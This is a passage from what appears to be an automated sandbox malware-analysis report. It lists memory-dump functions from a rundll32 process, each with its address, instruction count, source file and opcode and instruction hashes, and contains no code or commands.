                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7637ede4f100f0dc47b3f6695374222b2e29d492393617b2616f4f191b3d20f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD11E035B002246F9F94FBB950242AE7AE79FC821570008B9D40ADB344EF349E029BD6
                                                                                                                                                                                                                                          Function 04C92258 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2535624c6a2b2362f48b04fa578f67a3e2d856fd74548e4d644fb6f7f1253864
                                                                                                                                                                                                                                          • Instruction ID: 8c6c310eca22b4fb6d9369bc427df014378529848d48538368921b69ffee410b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2535624c6a2b2362f48b04fa578f67a3e2d856fd74548e4d644fb6f7f1253864
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721EA75E102189FCB44DF69D48499EBBF6FF4C310B108169E915EB365DB319942CF90
                                                                                                                                                                                                                                          Function 04C91378 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2190683370ee75e5767150251534838c2d5be34a93a07b6d8096450db54d4f3a
                                                                                                                                                                                                                                          • Instruction ID: 781c75a5e804050f37fa985341a9ee6689db3806f2b2a1a5fa3f13f965dd9c97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2190683370ee75e5767150251534838c2d5be34a93a07b6d8096450db54d4f3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB211570D002099FDB20DFAAC885BDEFBF5FB48324F508129D559A7240CB756906CFA5
                                                                                                                                                                                                                                          Function 04C91958 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9738400adac08b9777647a14dfaf3de0de6da0855155099b8de22af5ebe82ba6
                                                                                                                                                                                                                                          • Instruction ID: 709edbec9261c25b056180620dd45642b5035cba3b95cdbf33298afda23906bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9738400adac08b9777647a14dfaf3de0de6da0855155099b8de22af5ebe82ba6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0116A3DA00115AFDB18DFA4D555BA97BB2EFCC320F154029DA0AA7240CE389C4ACB90
                                                                                                                                                                                                                                          Function 04C91380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ed843301461cb8461e35788ad3ff176a339f944859e0237d4fa28612fe2a3715
                                                                                                                                                                                                                                          • Instruction ID: f9b571392043250f201f30fc21bfb5724a828fef7e7828d1fd7545abfc3d1105
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed843301461cb8461e35788ad3ff176a339f944859e0237d4fa28612fe2a3715
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1124B0D002099FDB20DFAAC481B9EFBF5FF48314F508129D85967240CB756905CFA5
                                                                                                                                                                                                                                          Function 04C91968 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d3bd9d397e641090e9530e625894e677a9fdb8e3e15301ca005e10b00ff21ddf
                                                                                                                                                                                                                                          • Instruction ID: 1941a12407a477a329fe8ead6b6cc163628506f8a63bf4fb174387e19b980d43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3bd9d397e641090e9530e625894e677a9fdb8e3e15301ca005e10b00ff21ddf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF11003DA00215AFDB14DF94D559BA97BB6EFCC321F144029EA09A7340CF795C45CB90
                                                                                                                                                                                                                                          Function 04C92B08 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e0187b7b11934c32cd4fffeec7a699877e368d1ca897ff74ca33dc381f08e332
                                                                                                                                                                                                                                          • Instruction ID: 3effdd3056ff12449ae446eace1a420a40ec52632872827b44c10a07b300e7ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0187b7b11934c32cd4fffeec7a699877e368d1ca897ff74ca33dc381f08e332
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4301B575B00214AF8B94FFB9901866E7BE7AFC8615B0108B9D44ADB344EF359D029BD2
                                                                                                                                                                                                                                          Function 04C91440 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 081bc6303c14bda0ee7ac2886bfaf1cdab264e8200a778e9454c066ea609fb84
                                                                                                                                                                                                                                          • Instruction ID: f448e9121a045ecd7c603d1e1b4eeb9d8c9381772179e95320701847745ea44c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 081bc6303c14bda0ee7ac2886bfaf1cdab264e8200a778e9454c066ea609fb84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F301B57CB153055FEB155F34696A3153FE6DED520130908AACA4ACF151ED14DD0A83D1
                                                                                                                                                                                                                                          Function 0316D006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.1375911616.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_316d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f690795f6eef2f97e8bce5e3890812a5c6b7a31bfcfc2d5481cd72ac9253127e
                                                                                                                                                                                                                                          • Instruction ID: cf81e76a38fcdbc1849070ddb094e783b0808da4bd838e8a0834c844a73d1e5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f690795f6eef2f97e8bce5e3890812a5c6b7a31bfcfc2d5481cd72ac9253127e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301407110D3C09FD7128B259C95B52BFB8DF47224F1D81DBD8888F2A3C2699844CB72
                                                                                                                                                                                                                                          Function 0316D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.1375911616.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_316d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d6a8c3d342fc985c6430e4f862d52941e9eebf020424e9ba7712753099add7ed
                                                                                                                                                                                                                                          • Instruction ID: 9bbb834e53e8e1ca943fa9568302966f21e2c28281380639785426ba16ded482
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a8c3d342fc985c6430e4f862d52941e9eebf020424e9ba7712753099add7ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F101F7306087449FE7208A61EC84B67FF9CDF49225F18C15AEC480F282C3789845CAB1
                                                                                                                                                                                                                                          Function 04C91829 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d507b3b4081015e82acd12abbf821ea733552f7646fd0c1326030a0aab883755
                                                                                                                                                                                                                                          • Instruction ID: 6e2f9cf7332d12004283b93e5e626531daa15130024906ae0170cbc976427c77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d507b3b4081015e82acd12abbf821ea733552f7646fd0c1326030a0aab883755
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01AD32B00216A7FB18AAA985593EE37E79BC8714F254029C002F3380CEB96D07E794
                                                                                                                                                                                                                                          Function 04C92A68 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 69d1790a7f620dafa8b7f0fea1935bf675812a1ccc5316965b331c4ce6a1574f
                                                                                                                                                                                                                                          • Instruction ID: 1431a08a0858c1ceccbdeba547eb75785029616629f9cd7c6e48be05da43a865
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d1790a7f620dafa8b7f0fea1935bf675812a1ccc5316965b331c4ce6a1574f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5014C75A002109FCB18AFB8D4056AA3BB5EB88711B105079D509DB364EF359D028BC0
                                                                                                                                                                                                                                          Function 04C92997 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9aa108408316c37bfdae93fc91648eab0d2f986996bd1a5d05b157bab3b91fc6
                                                                                                                                                                                                                                          • Instruction ID: 46dc52b6c903fd6a6729568fc5feece8737fe26fc5a931f45dcd7e6f35838713
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa108408316c37bfdae93fc91648eab0d2f986996bd1a5d05b157bab3b91fc6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0A439240300ABEB19AFB0EA047593B96EBC5211B044879E1018F291DF76EC498BD1
                                                                                                                                                                                                                                          Function 04C92A78 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 265a9f1849a16e52469e216b88d059e9780ebe9d696ef62a25f67d66907b21ea
                                                                                                                                                                                                                                          • Instruction ID: 092229fb865f9820a2cf88417234d1f3831ab180f8074d7670b5931de2e88700
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 265a9f1849a16e52469e216b88d059e9780ebe9d696ef62a25f67d66907b21ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10014B75A002149FCB18AB78D4057AE3BF9EB88610B101469E509DB354EF359D02CBC0
                                                                                                                                                                                                                                          Function 04C91431 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7f651242044fa9345efa977f92b7f54ad685a9b1b7f0ee799e8a3b7225479faa
                                                                                                                                                                                                                                          • Instruction ID: 046f5475f2ef7abc4707dc535953ba60c970f4c8f91cf290746758d5ead1d7bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f651242044fa9345efa977f92b7f54ad685a9b1b7f0ee799e8a3b7225479faa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46F0C26CE002066FEB185E74616A3153BD7EBD4251319082ECA46CF190ED28ED0583D1
                                                                                                                                                                                                                                          Function 04C929A8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f8d15a7a2fdcb21bd29416bd75a06cd589ba4568e5b2bec29a54c668da9264ff
                                                                                                                                                                                                                                          • Instruction ID: d4c1f31547ace41c524e70d6c3200746982c29c8db6ce4b3ef0c9ae1d416a271
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d15a7a2fdcb21bd29416bd75a06cd589ba4568e5b2bec29a54c668da9264ff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF0B43D3003006BEB18ABB0EA0575A3B9BEBC02017048838E1028F291DF76FC499BD1
                                                                                                                                                                                                                                          Function 04C92A20 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 087f3e417815004b40954e63f3a70e1f8a1bb3070e579b422fa1e80dd941a58f
                                                                                                                                                                                                                                          • Instruction ID: 4fb1c0970f103d4be2cc194db335e230d9fb5a84ca782cf6bc53060bbd98d387
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 087f3e417815004b40954e63f3a70e1f8a1bb3070e579b422fa1e80dd941a58f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE02636341620BF8A241FE6B20877E36DAEFC5631B0240BAE40AC7290DF19CE424784
                                                                                                                                                                                                                                          Function 04C92A30 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7b32a1a78a27eefecb9e60ece8d4fd52db7d3a36e0d9809c6b727e429e3a28b5
                                                                                                                                                                                                                                          • Instruction ID: 8a3895d73970e80560980d50c765631841b49630edcc4cd30ec9ce9b33758057
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b32a1a78a27eefecb9e60ece8d4fd52db7d3a36e0d9809c6b727e429e3a28b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28D0C236341124B79E1419E665087BE35CD9B816617010075F40AC2280DF0EDE4143C4
                                                                                                                                                                                                                                          Function 04C90C48 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: af11f4fdded27d0f4a9c18ef4008e1bdf8f1aae5ecca3710f07353e8dbce45d9
                                                                                                                                                                                                                                          • Instruction ID: 7a415b379db4538cbe7234f17e91f7babe30f2302ea107a1a3a891ac4a226083
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af11f4fdded27d0f4a9c18ef4008e1bdf8f1aae5ecca3710f07353e8dbce45d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62D0A7313512246FD604565CD454A59379ADB8A724B00045AF10ACB320CD52FC010389
                                                                                                                                                                                                                                          Function 04C92959 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2279e7410e59a4b294a59675bfef2f76289b99fedf18660ffc2dc6ee8553f558
                                                                                                                                                                                                                                          • Instruction ID: 313b9b4777243cb62c0ad218fece402aa1ab1c22d7c9bfbb5df6a3cf1f9559a8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2279e7410e59a4b294a59675bfef2f76289b99fedf18660ffc2dc6ee8553f558
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21E04F74804308DFCB14DFA4E50165DBFF8EB46310F2145A9D4049B210DA315E118B81
                                                                                                                                                                                                                                          Function 04C90C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c050ba2e7d8a50f39bf6b8ab1c8311d7be23c39f270648fc06bcb45745a3ff6f
                                                                                                                                                                                                                                          • Instruction ID: ff3728f7088195d22f0e41a0ca37691e93a3a675abbc4524b710b1c8708088d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c050ba2e7d8a50f39bf6b8ab1c8311d7be23c39f270648fc06bcb45745a3ff6f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28D0A73632011C7B66046695D88AA6A7BEEE7942613544423F90187210DD707C0593DA
                                                                                                                                                                                                                                          Function 04C95EB0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9637edec33fcd18eafec20b68fbe476ff6e8721e66af643001cfb89c455371e2
                                                                                                                                                                                                                                          • Instruction ID: 814625dd65c7293ac1fae26e618f66fc64d3c102fea9ef3417dd1dbe3e29d7ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9637edec33fcd18eafec20b68fbe476ff6e8721e66af643001cfb89c455371e2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3D05E393404208FE7149B28E0507D93763EB4AB14F220195D116CB3A1CE65C8078748
                                                                                                                                                                                                                                          Function 04C917F0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27ef0c196d8ee7105a12b3030177627f7c327cdf92089f9ee066ccd4990bf28e
                                                                                                                                                                                                                                          • Instruction ID: 66528cd34f46ac95c1c2557438e2d72d31fb1c3f43510df45b77b1d7ec86302c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27ef0c196d8ee7105a12b3030177627f7c327cdf92089f9ee066ccd4990bf28e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1D05E36624A18AFC7105F85E04AF697FB9AB59225B014077E9054B321DEB10D11D7C0
                                                                                                                                                                                                                                          Function 04C92968 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 00da6bdc1217a239a829d6c851ea568c312d270b2ac5c42b21adb9e97c15bf8a
                                                                                                                                                                                                                                          • Instruction ID: 4b25180cfbf787494c636d3e521485ca37c2573a2e9754825ba537781981cb2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00da6bdc1217a239a829d6c851ea568c312d270b2ac5c42b21adb9e97c15bf8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79D05E7490130CEFCB00DFB4E941A9EBFFDEB45200B2086A598049B214EE706E018BC1
                                                                                                                                                                                                                                          Function 04C90440 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: db7773ba74eb400518a7586082fcde6b083d8289f5f061dacc1f2f8f6335800a
                                                                                                                                                                                                                                          • Instruction ID: 2cfec2182690001789b852bf7c81de3823e1369083ad6438ede3a5f8a23ad50f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db7773ba74eb400518a7586082fcde6b083d8289f5f061dacc1f2f8f6335800a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C080F75569517FE31101540C415E117F2F6F16453994196C040D6403F12F755B8131

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FFAAB560C1D Relevance: 39.6, Strings: 30, Instructions: 2122COMMON
